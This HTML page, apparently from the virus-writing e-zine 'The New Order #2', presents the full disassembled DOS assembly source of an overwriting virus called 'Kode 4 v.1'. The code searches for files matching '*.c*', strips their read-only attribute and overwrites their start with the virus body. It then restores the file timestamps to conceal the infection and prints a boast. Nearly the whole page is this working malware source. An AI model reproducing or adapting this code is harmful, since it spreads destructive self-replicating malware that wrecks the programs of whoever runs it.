<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>Kode 4
v.1</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>seg_a segment byte
public<br>
assume cs:seg_a, ds:seg_a<br>
<br>
<br>
org 100h<br>
V_Length equ last-start<br>
KODE4 proc far<br>
<br>
start label near<br>
<br>
mov ax,0ff0fh<br>
int 21h<br>
cmp ax,0101h<br>
je done ; present<br>
<br>
<br>
mov ah,4Eh<br>
mov dx,offset filename<br>
int 21h<br>
<br>
Back:<br>
mov ah,43h<br>
mov al,0<br>
mov dx,9eh<br>
int 21h<br>
mov ah,43h<br>
mov al,01<br>
and cx,11111110b<br>
int 21h<br>
<br>
mov ax,3D01h<br>
mov dx,9Eh<br>
int 21h<br>
<br>
mov bx,ax<br>
mov ah,57h<br>
mov al,0<br>
int 21h<br>
<br>
push cx<br>
push dx<br>
<br>
<br>
mov dx,100h<br>
mov cl,v_length<br>
mov ah,40h<br>
int 21h<br>
<br>
<br>
pop dx<br>
pop cx<br>
mov ah,57h<br>
mov al,01h<br>
int 21h<br>
<br>
<br>
<br>
mov ah,3Eh<br>
int 21h<br>
<br>
mov ah,4Fh<br>
int 21h<br>
<br>
jnc Back<br>
mov ah,9h<br>
mov dx,offset DATA<br>
int 21h<br>
<br>
done: int 20h<br>
filename db &quot;*.c*&quot;,0<br>
DATA db &quot; -=+ Kode4 +=-, The one and ONLY!$&quot;<br>
<br>
<br>
kode4 endp<br>
LAST label near<br>
seg_a ends<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
